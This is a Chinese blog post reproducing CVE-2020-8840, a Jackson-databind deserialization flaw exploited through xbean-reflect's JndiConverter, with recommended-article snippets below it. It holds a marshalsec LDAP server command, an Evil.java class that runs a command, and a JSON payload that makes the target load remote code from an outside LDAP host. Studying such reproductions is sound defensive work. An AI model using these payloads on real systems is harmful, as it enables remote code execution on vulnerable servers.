CVE-2020-8840复现(xbean-reflect利用链)

最新推荐文章于 2024-04-05 09:58:14 发布
最新推荐文章于 2024-04-05 09:58:14 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: java 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43849522/article/details/111396689
版权

CVE-2020-8840复现(xbean-reflect利用链)

搭建环境

下载marshalsec并编译,启动jndi环境

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer https://www.youi.xin/#Evil

编写Evil.java,内容如下:

public class Evil {
    public Evil(){
        try{
            Runtime.getRuntime().exec("cmd.exe \c calc");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Evil e = new Evil();
    }
}

编译为class文件,并放到WEB中

javac Evil.java

漏洞演示

poc如下:
[“org.apache.xbean.propertyeditor.JndiConverter”, {“asText”:“ldap://47.100.32.193:1389/Evil”}]
漏洞演示:

package xin.youi;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Main {

    public static void main(String[] args) {
	// write your code here
         ObjectMapper mapper = new ObjectMapper();
         mapper.enableDefaultTyping();
         String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://47.100.32.193:1389/Evil\"}]";
         try {
             mapper.readValue(json,Object.class);
         } catch (IOException e){
             e.printStackTrace();
         }
    }
}

结果:
在这里插入图片描述

遇到的问题

在使用jdk8复现时出现了如下异常

com.fasterxml.jackson.databind.JsonMappingException: javax.naming.Reference cannot be cast to javax.naming.Context
 at [Source: (String)"["org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://47.100.32.193:1389/Evil"}]"; line: 1, column: 61] (through reference chain: org.apache.xbean.propertyeditor.JndiConverter["asText"])
	at com.fasterxml.jackson.databind.JsonMappingException.from(JsonMappingException.java:278)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:611)
	at com.fasterxml.jackson.databind.deser.SettableBeanProperty._throwAsIOE(SettableBeanProperty.java:599)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:143)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.vanillaDeserialize(BeanDeserializer.java:288)
	at com.fasterxml.jackson.databind.deser.BeanDeserializer.deserialize(BeanDeserializer.java:151)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer._deserialize(AsArrayTypeDeserializer.java:116)
	at com.fasterxml.jackson.databind.jsontype.impl.AsArrayTypeDeserializer.deserializeTypedFromAny(AsArrayTypeDeserializer.java:71)
	at com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserializeWithType(UntypedObjectDeserializer.java:712)
	at com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:68)
	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4013)
	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3004)
	at xin.youi.Main.main(Main.java:14)
Caused by: java.lang.ClassCastException: javax.naming.Reference cannot be cast to javax.naming.Context
	at org.apache.xbean.propertyeditor.JndiConverter.toObjectImpl(JndiConverter.java:35)
	at org.apache.xbean.propertyeditor.AbstractConverter.toObject(AbstractConverter.java:86)
	at org.apache.xbean.propertyeditor.AbstractConverter.setAsText(AbstractConverter.java:59)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at com.fasterxml.jackson.databind.deser.impl.MethodProperty.deserializeAndSet(MethodProperty.java:141)
	... 9 more

后来发现

jdk8的classloader为sun.misc.Launcher$AppClassLoader

jdk9的classloader为jdk.internal.loader.ClassLoaders$AppClassLoader

就报错信息看是在调用Method.invoke时导致错误(具体原因不明)
换成JDK9后成功。

cheney_103
关注
专栏目录
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-8840:Jackson-databind RCE
Fly_鹏程万里
07-11 2802
影响范围 jackson-databind before 2.9.10.3 jackson-databind before2.8.11.5 jackson-databind before2.7.9.7 漏洞类型 JDNI注入导致RCE 利用条件 开启enableDefaultTyping() 使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖 漏洞概述 2020年2月,jackson-databind在github上更新了一个新的反..
探索Jackson库的安全漏洞修复:CVE-2020-8840
最新发布
gitblog_00016的博客
04-05 603
探索Jackson库的安全漏洞修复:CVE-2020-8840 去发现同类优质开源项目:https://gitcode.com/ 项目简介 在中,开发者jas502n分享了对Jackson库中一个关键安全漏洞CVE-2020-8840的研究和修复过程。Jackson是Java最流行的JSON处理库之一,广泛应用于Web服务、后端开发等领域。这个项目旨在帮助用户理解这个漏洞并提供解决方案。 技术分析...
CVE-2020-8840复现
weixin_39811856的博客
07-01 3024
0x00 漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用触发JNDI远程类加载从而达到远程代码执行。 0x01 环境搭建 搭建一个web服务器,我们采用python3 在web服务器目录放上已经编译好的恶意类 恶意文件内容为: 启动ldap服务 这...
FasterXML Jackson-databind远程代码执行漏洞 CVE-2020-8840 已亲自复现 未完成
qq_42430287的博客
12-27 1701
受影响版本的jackson-databind中缺少某些xbean-reflect/JNDI黑名单类,如org.apache.xbean.propertyeditor.JndiConverter,导致攻击者可通过JNDI注入的方式对此漏洞进行利用,成功时可以实现远程代码执行。2.0.0
FasterXML/jackson-databind 远程代码执行漏洞(CVE-2020-8840复现
玄道的网安博客
12-12 6456
漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用触发JNDI远程类加载从而达到远程代码执行。 影响版本 2.0.0 <= FasterXML jackson-databind Version <= 2.9.10.2 环境搭建 项目地址: h...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
cve-2020-8840.zip
05-03
**CVE-2020-8840漏洞详解** CVE-2020-8840,全称为“Lightweight Directory Access Protocol (LDAP) Injection”,是一种针对LDAP服务器的安全漏洞。该漏洞允许攻击者通过注入恶意 LDAP 查询来操纵目录服务,获取...
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞
marshalsec-0.0.3-SNAPSHOT-all.jar
08-23
Moritz Bechler编写,源码地址为:https://github.com/mbechler/marshalsec,下载下来之后使用maven编译,此工具为编译好的jar包,方便没有编译环境的同学们直接jar包开启ldap和rmi服务 开启rmi服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://VPS/ExportObject 1099 开启ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS/ExportObject 1389 我使用这个来测试springboot jolokia的远程命令执行,也可以测试struts2 S系列的漏洞
Jackson反序列化
Finlinlts的博客
10-01 5626
jackson介绍 Jackson是一个能够将java对象序列化为JSON字符串,也能够将JSON字符串反序列化为java对象的框架。是基于Java平台的一套数据处理工具,被称为”最好的Java Json解析器”。它可以使我们高效、简便的处理json字符串。 序列化 序列化函数为databind.ObjectMapper。 当Jackson开启某些配置时,会允许开发者在反序列化时指定要还原的类,过程中调用其构造方法setter方法或某些特殊的getter方法,当这些方法中存在一些危险...
jackson-databind远程代码执行漏洞(CVE-2020-8840)修复与测试
Quarrie的博客
05-03 4039
漏洞介绍 攻击者可以利用此漏洞通过JNDI注入的方式执行本地Web容器下的任意代码,后文中将测试LDAP方式的远程代码调用,受影响版参见:NVD。 修复建议 网上能找到的大部分修复建议是将jackson-databind的版本升级到2.9.10.4或后续版本,此方法的确行之有效,但是对于使用JDK1.6的老项目就比较尴尬,因为至2.8版本后jackson-databind字节码不再兼容JDK1.6...
java 开源项目marshalsec,快速搭建jndi相关server,目前实现了ldap,rmi。
FREEDOM
12-11 2290
开源项目的git代码地址:GitHub - mbechler/marshalsec 编译 这里跳过编译时的test mvn "-Dmaven.test.skip=true" -P clean package 编译后target目录 演示如何启动ldap服务 上传编译后的class文件到http服务器 把Exploit.class文件放在http服务器上,这里使用nginx服务器,访问地址为http://127.0.0.1/test/Exploit.class. 启动ldap...
服务攻防-开发组件安全&Jackson&FastJson各版本&XStream&CVE环境复现
siu~
01-28 1308
知识点 1、J2EE-组件Jackson-本地demo&CVE(数据处理) 2、J2EE-组件FastJson-本地demo&CVE(数据处理) 3、J2EE-组件XStream-本地demo&CVE(数据处理) 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
[Java安全]—JNDI注入
Sentiment的博客
07-08 2691
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
FastJson反序列化漏洞(复现
小赵同学的博客
07-29 4010
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson
N的博客
03-14 2374
Fastjson:我一路向北,离开有你的季节
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值